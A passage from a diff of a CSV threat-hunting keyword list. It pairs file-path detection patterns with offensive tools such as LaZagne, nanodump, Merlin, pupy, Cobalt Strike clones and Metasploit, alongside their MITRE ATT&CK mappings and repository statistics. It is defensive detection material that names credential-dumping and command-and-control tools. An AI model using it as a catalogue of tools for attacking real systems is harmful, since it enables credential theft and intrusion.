T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z"
 "*/MalSCCM.git*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z"
 "*/MalSCCM.sln*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z"
 "*/malseclogon.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
 "*/MalStuff.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
-"*/man_in_the_browser/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*/man_in_the_browser/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*/man_in_the_browser/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*/man_in_the_browser/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
 "*/manage/exec_cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*/Management/C2/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
 "*/manjusaka/plugins*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 
- T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" -"*/MANSPIDER.git*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*/manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*/manspider_output*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/manspiderDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/master/GPSCoordinates/*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/master/JunctionFolder/*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/master/PhantomService/*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/MANSPIDER.git*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/manspider_output*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/manspiderDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/masky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/master/GPSCoordinates/*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" 
+"*/master/JunctionFolder/*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/master/PhantomService/*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/maxdb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mcafee-epo-agent.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/membase-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/membase-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/memcached-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/memodipper64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/memory_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/memory_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*/mempodipper.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/MemReader_BoF/*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" "*/merlin.dll*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*/merlin.html*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*/merlin.js*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - 
T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*/merlin.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" -"*/merlin/agent_code/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/merlin.html*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*/merlin.js*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*/merlin.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/merlin/agent_code/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/met_inject.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/Metasploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*/metasploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/metasploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/metasploit-framework/embedded/framework*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/metasploit-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metasploit-msgrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metasploit-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metatwin.git*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" -"*/meterpreter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/meterpreter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
